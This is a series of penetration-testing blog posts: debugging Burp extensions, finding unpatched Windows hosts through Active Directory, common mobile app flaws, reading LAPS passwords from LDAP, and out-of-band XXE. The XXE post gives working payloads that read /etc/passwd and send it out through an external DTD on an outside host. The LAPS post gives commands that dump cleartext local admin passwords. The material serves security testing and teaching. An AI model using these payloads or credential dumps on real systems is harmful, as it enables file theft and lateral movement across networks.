Debugging Burp Extensions

Burp is a very useful tool for just about any type of testing that involves HTTP. What makes it even better is the extension support that it offers. People can complement the features Burp has to offer with their own extensions to create a powerful, well-rounded application testing tool that is tailored to their needs. Sometimes, however, our extensions don’t work the way we want and require additional debugging. In this blog post, I’m going to walk through how we can set up debugging in Burp and our IDE when we create Burp extensions. Essentially, we are just going to be setting up Java remote debugging. This should hopefully be a useful tutorial for people who are creating buggy Burp extensions and want to figure out why they aren’t working. It should be especially helpful for first-time Java developers who are not accustomed to Java’s debugging capabilities. This will not be a tutorial on creating Burp extensions. For help on that, I’ll refer you to the PortSwigger extender tutorials here.

Requirements

Java SDK (1.7 or 1.8)

Java IDE (I prefer IntelliJ)

Burp Suite (latest free or pro edition)

Getting Started

To begin debugging extensions in Burp, we first need an extension to debug. For this example, I’ll be using the Wsdler extension I created for parsing WSDL files. If you would like to follow along, the code for Wsdler is located here. We’ll pull it down with git clone.

C:\Users\egruber\Repositories>git clone git@github.com:NetSPI/Wsdler.git
Cloning into 'Wsdler'...
remote: Counting objects: 458, done.
remote: Total 458 (delta 0), reused 0 (delta 0), pack-reused 458
Receiving objects: 100% (458/458), 19.59 MiB | 221.00 KiB/s, done.
Resolving deltas: 100% (204/204), done.
Checking connectivity… done.

Next, we’ll open this up in our IDE. I’m using IntelliJ, but this can be accomplished using any Java IDE (I think). Select File > Open and navigate to the directory and press OK. IntelliJ should open the directory as a project in its workspace.

Attaching the Debugger

Now that we have our Burp extension in IntelliJ, let’s configure our debugger. Unfortunately, we can’t just hit Run > Debug to start debugging.

Burp extensions are executed inside Burp; they are generally not standalone jar files with a main class. We can still debug them, however, with Java’s remote debugging capability, which allows a debugger to attach to a running Java process and send and receive debug information. To do this, select Edit Configurations from the Run menu.

A Run/Debug Configurations window should appear.

Press the green plus sign and select Remote to create a remote debug configuration.

This allows us to set up remote debugging against running processes. Name the configuration whatever you like; I use Burp. Leave all the configuration options set to the defaults unless you know what you’re doing. Next, copy the first command line string, the one that starts with -agentlib. You need to add this as an argument to your Java process so the debugger can attach to it. When executed, Java will open port 5005 for remote debugging, allowing the debugger to send commands through that port to the JVM process. Press OK at the bottom of the window. You should now see your debug configuration under Run.

Now we need to start Burp with the command line argument from our debug configuration. Open up a command prompt and start Burp with the argument.

C:\>java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -jar burpsuite_pro_v1.6.18.jar
Listening for transport dt_socket at address: 5005

The JVM should now be listening on port 5005, the port we specified in our configuration. Next, we’ll go back to our IDE and select Run > Debug Burp. The console window should pop up saying it is connected to the target VM.

Setting Breakpoints

Now that we have our debugger attached to Burp we can start setting breakpoints in our extension code. First, make sure your extension is actually loaded in Burp’s extender!

When setting breakpoints, try not to set them on method names themselves. This can slow down Burp considerably. Instead, set breakpoints on lines of code within the methods you want to debug. The first breakpoint I’m going to set is within the WSDL parsing method in my extension. We will pause execution at the point the response byte array is set.
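To make this concrete, below is a stripped-down extension written against Burp's legacy extender API. It is not the actual Wsdler code, just a minimal sketch showing the kind of line a breakpoint belongs on:

package burp;

public class BurpExtender implements IBurpExtender, IHttpListener {
    @Override
    public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
        callbacks.setExtensionName("Debug demo");
        callbacks.registerHttpListener(this);
    }

    @Override
    public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo) {
        if (!messageIsRequest) {
            // Set the breakpoint on a line like this one, not on the method declaration above
            byte[] response = messageInfo.getResponse();
            // ... parsing logic would go here ...
        }
    }
}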

If everything is set up, go back to Burp and execute whatever is needed for your extension to be used. In this example, I will right-click on the request I want to parse the WSDL from and select Parse WSDL.

Our debugger should pause on the breakpoint immediately and display the current frames and variables.

We can walk through the code by selecting the step buttons on the top of the debugging menu.

Stepping over the response assignment should reveal the response variable in the variables section of the debug console. The debugger should also be on the next line of code.

We can go further and step inside functions, but I’ll leave that out for now.

Conclusion

Hopefully this little tutorial is somewhat helpful when trying to fix your Burp extensions through debugging. I know I have spent hours debugging my own extensions and the Java debugger is immensely more helpful than having System.out.println() statements everywhere.

A Faster Way to Identify High Risk Windows Assets

Scanning is a pretty common first step when trying to identify Windows systems that are missing critical patches. However, there is a faster way to start the process. Active Directory stores the operating system version and service pack level for every Windows system associated with the domain. Historically that information has been used during penetration tests to target systems missing patches like MS08-067, but it can also be used by blue teams to help streamline identification of high risk assets as part of their standard vulnerability management approach. In this blog I’ll give a high-level overview of how it can be done and point to a few scripts that can help automate the process.

Introduction to Computer Accounts

When a system is added to a Windows domain, a computer account is created in Active Directory. The computer account provides the computer with access to domain resources similar to a domain user account. Periodically the computer account checks in with Active Directory to do things like rotate its password, pull down group policy updates, and sync OS version and service pack information. The OS version and service pack information are then stored in Active Directory as properties which can be queried by any domain user. This makes it a great source of information for attackers and blue teamers. There is also a hotfix property associated with each computer account in Active Directory, but from what I’ve seen it’s never populated. So at some point vulnerability scanning (or at least service fingerprinting) is required to confirm that systems suffer from critical vulnerabilities.
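For reference, pulling that information boils down to a single LDAP query. A filter along the lines of the one below (illustrative, but using the standard Active Directory attribute names) returns every enabled computer account along with its operating system details:

Filter:     (&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))
Attributes: operatingSystem, operatingSystemVersion, operatingSystemServicePack, lastLogonTimestamp

The userAccountControl clause simply excludes disabled computer accounts.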

Vulnerability Scanner Feature Requests 🙂

To my knowledge, none of the major vulnerability scanners use the computer account properties from Active Directory during scanning (although I haven’t reviewed them all in detail). My hope is that sometime in the near future they’ll add some options for streamlining the identification of high risk Windows assets (and potentially asset discovery) using an approach like the one below.

  1. A vulnerability scanning profile for “High Risk Windows Systems Scan” could be selected in the vulnerability scanning software. The profile could be configured with least privileged domain credentials for authenticating to Active Directory. It could also be configured with network ranges to account for systems that are not part of the domain.
  2. A vulnerability scan could be started using the profile. The scan could connect to Active Directory via LDAP or the Active Directory Web Service (ADWS) and dump all of the enabled domain computers from Active Directory along with their OS version and Service Pack level.
  3. The results could be filtered using a profile configuration setting to only show systems that have checked in with Active Directory recently. Typically, if a system hasn’t checked in with Active Directory in a month, then it’s most likely been decommissioned without having its account disabled.
  4. The results could be filtered again for OS versions and service pack levels known to be out of date or unsupported.
  5. Finally, a credentialed vulnerability scan could be conducted against the supplied network ranges and the filtered list of domain systems pulled from Active Directory to help verify that they are actually vulnerable.

They may be obvious, but I’ve listed some of the advantages of this approach below:

  • High risk assets can be identified and triaged quickly.
  • Targeting doesn’t rely on potentially out-of-date asset lists.
  • The initial targeting of high risk systems does not require direct access to isolated network segments that are a pain to reach.
  • From an offensive perspective, the target enumeration usually goes undetected.

I chatted with Will Schroeder a little, and he added that it would be nice if vulnerability scanners also had an Active Directory vulnerability scanning profile to account for all of the misconfigurations that penetration testers commonly take advantage of. This could cover quite a few things including, but not limited to, insecure group policy configurations (covers a lot) and excessive privileges related to delegation, domain trusts, group inheritance, GPO inheritance, and Active Directory user/computer properties.

Automating the Process with PowerShell

Ideally it would be nice to see Active Directory data mining techniques used as part of vulnerability management programs more often. However, I think the reality is that until the functionality comes boxed with your favorite vulnerability scanner it won’t be a common practice. While we all wait for that to happen, there are a few PowerShell scripts available to help automate some of the process. I spent a little time writing a PowerShell script called “Get-ExploitableSystems.psm1” that can automate some of the steps I listed in the last section. It was built off of work done in two great PowerShell projects: PowerTools (by Will Schroeder and Justin Warner) and Posh-SecMod (by Carlos Perez).

PowerView (which is part of the PowerTools toolkit) has a function called “Invoke-FindVulnSystems” which looks for systems that may be missing patches like MS08-067. It’s fantastic, but I wanted to ignore disabled computer accounts and sort by last logon dates to help determine which systems are alive without having to wait for ping replies. Additionally, I built in a small list of relevant Metasploit modules and CVEs for quick reference.

I also wanted the ability to easily query information in Active Directory from a non-domain system. That’s where Carlos’s Posh-SecMod project comes in. I used Carlos’s “Get-AuditDSComputerAccount” function as a template for authenticating to LDAP with alternative domain credentials via ADSI.

Finally, I shoved all of the results into a data table object. I’ve found that data tables can be really handy in PowerShell, because they allow you to dump out your dataset in a way that easily feeds into the PowerShell pipeline. For more details take a look at the code on GitHub, but be warned – it may not be the prettiest code you’ve ever seen. 😉

Get-ExploitableSystems.psm1 Examples

The Get-ExploitableSystems.psm1 module can be downloaded here.  As I mentioned, I’ve tried to write it so that the output works in the PowerShell pipeline and can be fed into other PowerShell commands like “Test-Connection” and “Export-Csv”.  Below are a few examples of standard use cases.

1. Import the module.

Import-Module Get-ExploitableSystems.psm1

2. Run the function using integrated authentication.

Get-ExploitableSystems

3. Run the function against a domain controller in a different domain and make the output pretty.

Get-ExploitableSystems -DomainController 10.2.9.100 -Credential demo\administrator | Format-Table -AutoSize

4. Run the function against a domain controller in a different domain and write the output to a CSV file.

Get-ExploitableSystems -DomainController 10.2.9.100 -Credential demo\administrator | Export-Csv c:\temp\output.csv -NoTypeInformation

5. If you’re still interested in pinging hosts to verify they’re up you can use the command below.

Get-ExploitableSystems -DomainController 10.2.9.100 -Credential demo\administrator | Test-Connection

Since Will is a super ninja PowerShell guru he has already integrated the Get-ExploitableSystems updates into PowerTools. So I recommend just using PowerTools moving forward.

Active Directory Web Service Example

As it turns out, you can do the same thing pretty easily with Active Directory Web Services (ADWS). ADWS can be accessed via the PowerShell Active Directory module cmdlets and is basically used to manage the domain. To get the cmdlets set up on a Windows 7/8 workstation, you should be able to follow the instructions below.

1. Download and install “Remote Server Administration Tools” for Windows 7/8: https://www.microsoft.com/en-us/download/details.aspx?id=7887

2. In PowerShell run the following commands:

Import-Module ServerManager
Add-WindowsFeature RSAT-AD-PowerShell

3. Verify that the ActiveDirectory module is available with the following command:

Get-Module -ListAvailable

4. Import the Active Directory module.

import-module ActiveDirectory

Now you should be ready for action!

As I mentioned before, one of my requirements for the script was having the ability to dump information from a domain controller on a domain that my computer is not associated with, using alternative domain credentials. Khai Tran was nice enough to show me an easy way to do this with the Active Directory PowerShell provider. Below are the basic steps. In the example below, a.b.c.d represents the target domain controller’s IP address.

New-PSDrive -PSProvider ActiveDirectory -Name RemoteADS -Root "" -Server a.b.c.d -credential domain\user
cd RemoteADS:

Now every PowerShell AD command we run should be issued to the remote domain controller. 🙂 I recently came across a really nice PowerShell presentation by Sean Metcalf called “Mastering PowerShell and Active Directory” that covers some useful ADWS command examples. Below is a quick code example showing how to dump active computer accounts and their OS information based on his presentation.

$tendays = (Get-Date).AddDays(-10)
Get-ADComputer -Filter {Enabled -eq $true -and LastLogonDate -gt $tendays} -Properties samaccountname,Enabled,LastLogonDate,OperatingSystem,OperatingSystemServicePack,OperatingSystemHotFix |
    Select-Object name,Enabled,LastLogonDate,OperatingSystem,OperatingSystemServicePack,OperatingSystemHotFix |
    Format-Table -AutoSize

The query only shows enabled computer accounts that have logged in within the last 10 days. You should be able to simply change the -10 if you want to go back further. However, after some reading it sounds like “LastLogonDate” is relative to the domain controller you’re querying, so to get the real “LastLogonDate” you’ll have to query all of the domain controllers.

Wrap Up

In this blog I took a quick look at how common Active Directory mining techniques used by the pentest community can also be used by blue teams to reduce the time it takes to identify high-risk Windows systems in their environments. Hopefully, as time goes on, we’ll see vulnerability scanners and SIEM solutions using them too. Whatever side you’re on (red or blue), I hope the information has been useful. Have fun and hack responsibly. 🙂

Top 10 Critical Findings of 2014 – Mobile Applications

We saw a very large increase in the number of mobile applications we tested in 2014. Among them, there were slightly more iOS applications than Android ones. In this blog post I will cover high-level trends and the top 10 critical vulnerabilities we saw during mobile application penetration tests in 2014.

High Level Trends

There were a lot of new trends in 2014 compared to previous years. I’ve listed some of the more interesting ones below.

  • An increase in the use of cross-platform development frameworks such as PhoneGap, Appcelerator, and Xamarin to write applications that can be deployed to both iOS and Android
  • A decrease in wrapped browser (webview) applications
  • An increase in the use of MDM solutions to push out applications to enterprise devices
  • An increase in the use of MDM solutions to encrypt application traffic
  • A decrease in applications using the local SQLite database to store anything but configuration information
  • An increase in applications using root/jailbreak detection to prevent installation
  • An increase in certificate pinning to help prevent encrypted traffic interception

In my previous Top 10 blog post on Thick Applications, I pointed out that we spend most of our time testing web services. This is also true with mobile applications. You may also notice that many of the findings listed here are also found in the thick application post. It just goes to show that new hot-off-the-press mobile applications suffer from the same problems that plague thick applications created fifteen years ago.

So without further ado, here are the top 10 critical mobile application findings for 2014, listed in order from most to least common.

SQL Injection

SQL injection is still very prevalent via the web services of a mobile application, though we rarely, if ever, see it against an application’s local SQLite database. We often see that application developers take the mobile aspect for granted and don’t properly protect their web services on the backend. However, it is very easy to proxy a connection between a device and a server on iOS and Android. Don’t rely on protective measures such as certificate pinning to prevent traffic tampering; it’s not effective. Fix the issue at its heart.
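The fix is the same as it has always been: parameterized queries on the backend. Below is a minimal sketch in Java (the table and column names are made up for illustration; the same idea applies to whatever language the web service is written in):

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

public class AccountLookup {
    // Bind user-supplied input as a parameter instead of concatenating it into the query
    public static String getEmail(Connection conn, String username) throws SQLException {
        String sql = "SELECT email FROM accounts WHERE username = ?";
        try (PreparedStatement stmt = conn.prepareStatement(sql)) {
            stmt.setString(1, username);
            try (ResultSet rs = stmt.executeQuery()) {
                return rs.next() ? rs.getString("email") : null;
            }
        }
    }
}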

Cleartext Credential Storage

We often see mobile applications store unencrypted credentials within configuration files and local SQLite databases on a device. Usually those credentials can be used to access potentially sensitive data and external services. This is bad. Never store credentials anywhere on a device. If your application stores credentials to re-authenticate to a backend service without the user having to provide them again, consider using a time-limited session key that can be destroyed.

Hardcoded Credentials in Source Code

This is pretty common for us to find and primarily affects Android applications because they can be decompiled back to nearly complete Java code if they’re not obfuscated. It is possible to disassemble iOS binaries and search for credentials in them too. Never hardcode credentials in the code of an application. If a user can access your application, they can undoubtedly access anything within the source code as well. Never assume people aren’t looking.

Hardcoded Encryption Keys

We see encryption keys hardcoded in source code all the time. Again, this primarily affects Android applications because of the relative ease of decompiling APK files. As I said in my thick application post, encryption is only as strong as where the key is held. The recommendation is also the same. If data requires encryption with a key, move it from the client to the server to prevent access to keys.

Hardcoded or Nonexistent Salts

I’ll take the exact blurb that I used in my thick application post. When using encryption, it is always a good idea to use a salt. However, if that salt is hardcoded in an application with an encryption key, it becomes pretty much useless. When it comes to encryption being a salty S.O.B. is a good thing. Randomize! Randomize! Randomize!
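As a quick illustration (a generic sketch, not tied to any particular app), generating a random per-record salt takes only a couple of lines with Java's standard library:

import java.security.SecureRandom;

public class SaltExample {
    public static byte[] newSalt() {
        byte[] salt = new byte[16];          // 16 random bytes per record
        new SecureRandom().nextBytes(salt);  // cryptographically strong RNG
        return salt;                         // store the salt alongside the ciphertext or hash
    }
}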

XML External Entity Injection

This has become more prevalent in the past year with many mobile web services communicating with XML. XXE often results in read access to files on the server, as well as UNC path injection that can be used to capture and crack credentials from the web server if it is running Windows. Most XML parsing libraries support disallowing declared DTDs and entities; this should be set as the default when reading XML to help prevent injection, as shown in the sketch below. Another possible fix is to scrap XML altogether and instead use JSON, where this isn’t an issue.
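For example, with Java's built-in DOM parser the hardening comes down to a handful of factory features (a generic sketch using standard Xerces/SAX feature flags, not tied to any particular application):

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

public class SafeXmlParser {
    public static DocumentBuilder newBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Reject any DOCTYPE declaration outright; this blocks external entities and external DTDs
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth in case DOCTYPEs have to be allowed for some reason
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf.newDocumentBuilder();
    }
}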

Logging of Sensitive Information

Logging of data is fairly common in applications that we test, both in production and QA environments. Oftentimes it comes from having some type of debugging option enabled. This isn’t necessarily a bad thing until there’s data that you don’t want anyone to see. The most common sensitive data we see are credentials. Make sure that debugging is disabled for production applications, and check application and system logs during testing to ensure unintended data is not there.

Unencrypted Transmission of Data

This is still common to see in mobile applications. Every application we test uses web services, but not all use encryption. Utilizing TLS should be the default for all traffic coming to and from the application. Oftentimes we see this in mobile applications developed for use in internal environments where security requirements are unfortunately more relaxed. Throw that notion out the window and encrypt everything.

Authorization Bypass

As with thick applications, we see a lot of mobile applications use the GUI to enforce security controls without checking authorization on the backend. A user could access what they need by bypassing the GUI entirely and sending the requests they want directly through a proxy such as Burp. We have also seen applications pulling user permissions from the server and storing them on the client. A user could modify the permissions in the HTTP response before it reaches the client. Usually these permissions are worded in such a way that their meaning is obvious, such as has_access_to_secret_information=false. Replacing everything with true is an easy way to bump up your privileges and bypass intended application authorization. The solution is to never rely on the client for authorization checks.

Sensitive Data Displayed in the GUI

This finding is pretty self-explanatory. An application displays cleartext passwords, social security numbers, credit card numbers, etc. unmasked within the GUI. This is bad not only because that information should generally not be displayed to the user, but also because it has to be stored either on the device or within a backend database somewhere. This is also bad if coupled with mobile applications not requiring users to re-authenticate when the application has been put into the background on the device. For example, if you have an application open and you hit the home button on an iOS device, the application is paused in the background. Selecting the application again will generally reopen it where you left off. So if you give someone your iPad after you looked at an application that doesn’t mask sensitive information about you, that someone could just open it up again and see everything. This can be especially bad if you don’t have a password set on your lock screen.

Conclusion

Everything is going mobile, and the security of the information that can be accessed and stored should be priority number one. Take the above information into consideration when developing your mobile applications, and always remember to test. If you’re not testing your apps, someone else will, and they probably won’t be so candid about what they find.

Running LAPS Around Cleartext Passwords

Intro

Managing credentials for local administrator accounts is hard to do. From setting strong passwords to setting unique passwords across multiple machines, we rarely see it done correctly. On the majority of our pen tests we see that most of the domain computers are configured with the same local admin credentials. This can be really handy for an attacker, as it provides lateral access to systems across the network.

One of the reported fixes (from Microsoft) is to store the local admin passwords in LDAP as a confidential attribute of the computer account. This can be automated using Microsoft tools, and strong local passwords can be enforced (and automatically changed). In theory, this is a nice idea. But in practice, it results in the cleartext storage of passwords (not good). Previous attempts at local administrator credential management (from Microsoft) resulted in local administrator credentials being exposed to all users on the domain (through Group Policy Preferences). The GPP cpassword storage issue was patched (5/13/14), and we’re not seeing it as frequently anymore.

LAPS

LAPS is Microsoft’s tool to store local admin passwords in LDAP. As long as everything is configured correctly, it should be fine to use. But if you don’t set the permissions correctly on the LDAP attributes, you could be exposing the local admin credentials to users on the domain. LAPS uses two LDAP attributes to store the local administrator credentials: ms-MCS-AdmPwd (stores the password) and ms-MCS-AdmPwdExpirationTime (stores when it expires). The Microsoft guidance says to remove the extended rights to the attributes from specific users and groups. This is a good thing to do, but it can be a pain to get set up properly. Long story short, if you’re using LAPS, someone on the domain may well be able to read those local admin credentials in cleartext. This will not always be a privilege escalation route, but it could be handy data to have when you’re pivoting to sensitive systems after you’ve escalated. In our demo domain, our LAPS deployment defaulted to allowing all domain users read access to the password. We also could have screwed up the install instructions.
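For reference, reading the attributes is just another LDAP query once you are authenticated to the domain. A query along the lines of the following (illustrative filter, but the attribute names are the real LAPS schema attributes) returns the stored password for every computer account that has one, assuming your account can read it:

Filter:     (&(objectCategory=computer)(ms-MCS-AdmPwd=*))
Attributes: ms-MCS-AdmPwd, ms-MCS-AdmPwdExpirationTime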

I put together a quick PowerShell script to pull the LAPS specific LDAP attributes for all of the computers joined to the domain. I used Scott Sutherland’s Get-ExploitableSystems script (now included in PowerView) as the template. You can find it on my GitHub page.

Script Usage and Output

Here’s the output using an account that does not have rights to read the credentials (but proves they exist):

PS C:\> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential DEMO\karl | Format-Table -AutoSize

Hostname                    Stored Readable Password Expiration
--------                    ------ -------- -------- ----------
WIN-M8V16OTGIIN.test.domain   0      0               NA
WIN-M8V16OTGIIN.test.domain   0      0               NA
ASSESS-WIN7-TEST.test.domain  1      0               6/3/2015 7:09:28 PM

Here’s the same command being run with an account with read access to the password:

PS C:\> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential DEMO\administrator | Format-Table -AutoSize

Hostname                    Stored Readable Password       Expiration
--------                    ------ -------- --------       ----------
WIN-M8V16OTGIIN.test.domain   0      0                     NA
WIN-M8V16OTGIIN.test.domain   0      0                     NA
ASSESS-WIN7-TEST.test.domain  1      1      $sl+xbZz2&qtDr 6/3/2015 7:09:28 PM

The usage is pretty simple and everything is table friendly, so it’s easy to export to a CSV.

Special thanks to Scott Sutherland for letting me use his Get-ExploitableSystems script as the bones for the script. The LDAP query functions came from Carlos Perez’s Posh-SecMod (and were also adapted from Scott’s script). And the overall idea to port this over to a PowerView-friendly function came from a conversation with @_wald0 on Twitter.

Bonus Material

If you happen to have the AdmPwd.PS PowerShell module installed (as part of LAPS), you can use the following one-liner to pull all the local admin credentials for your current domain (assuming you have the rights, and that $colResults already holds the computer account results from a directory search like the one the script above uses):

foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}

Forcing XXE Reflection through Server Error Messages

XML External Entity (XXE) injection attacks are a simple way to extract files from a remote server via web requests. For easy use of XXE, the server response must include a reflection point that displays the injected entity (remote file) back to the client. Below is an example of a common XXE injection request and response; the injected entity is declared in the DOCTYPE and referenced in the value element.

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/xml
Content-Length: 2467

<?xml version="1.0" encoding="UTF-8"?>
<errors>
<error>no results for name root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....
</error>
</errors>

However, it’s also very common for nothing to be returned in the error response if the application doesn’t reflect any user input back to the client. This can make simple XXE attacks harder. If the vulnerable server is allowed to make connections to remote systems, then it’s possible to use an external DTD to extract local files via web requests. This technique has been covered in greater detail in this whitepaper, but below is an overview of how the modified XXE injection technique works and can be executed.

1. Host a .dtd file on a web server that is accessible from the vulnerable system. In my example the “netspi.dtd” file is hosted on xxe.netspi.com. The DTD file contains an XXE injection that will send the contents of the /etc/passwd file to the web server at https://xxe.netspi.com.

<!ENTITY % payload SYSTEM "file:///etc/passwd">

<!ENTITY % param1 '<!ENTITY % external SYSTEM "https://xxe.netspi.com/x=%payload;">'> %param1; %external;

2. Next, the attack can be executed by referencing the hosted DTD file as shown below. The request doesn’t even need to contain any meaningful XML body, as long as the server processes XML requests.

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 139

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo SYSTEM "https://xxe.netspi.com/netspi.dtd">
<root>
<search>name</search>
</root>

3. At this point the XXE attack results in a connection to xxe.netspi.com to load the external DTD file. The hosted DTD file then uses parameter entities to wrap the contents of the /etc/passwd file into another HTTP request to xxe.netspi.com.

4. Now it may be possible to extract the contents of the /etc/passwd file without having a reflection point on the page itself, simply by reading the incoming traffic on xxe.netspi.com. The file contents can be parsed from web server logs or from an actual page.
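When the extraction works (see the note about line breaks below), the data shows up directly in the request line of the access log on xxe.netspi.com; an illustrative entry might look something like this:

GET /x=root:x:0:0:root:/root:/bin/bash HTTP/1.1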

I should note that only a single line of /etc/passwd can be read using this method, or the HTTP request may fail altogether because of the line breaks in the target file. There is another option, though. In some cases it’s possible to make data extraction easier by forcing an error on the server by adding an invalid URI to the request. Below is an example of a modified DTD:

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'> %param1; %external;

If the server displays verbose errors to the client, the error may contain the contents of the file that’s being extracted. Below is an example:

HTTP Response:

HTTP/1.1 500 Internal Server Error
Content-Type: application/xml
Content-Length: 2467

<?xml version="1.0" encoding="UTF-8"?><root>
<errors>
<errorMessage>java.io.FileNotFoundException: file:///nothere/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....

The invalid file path causes a “FileNotFoundException” and an error message that contains the /etc/passwd file contents. This same technique was recently covered in this Drupal XXE whitepaper as well, but since I already had the blog written, I thought I might as well publish it 🙂
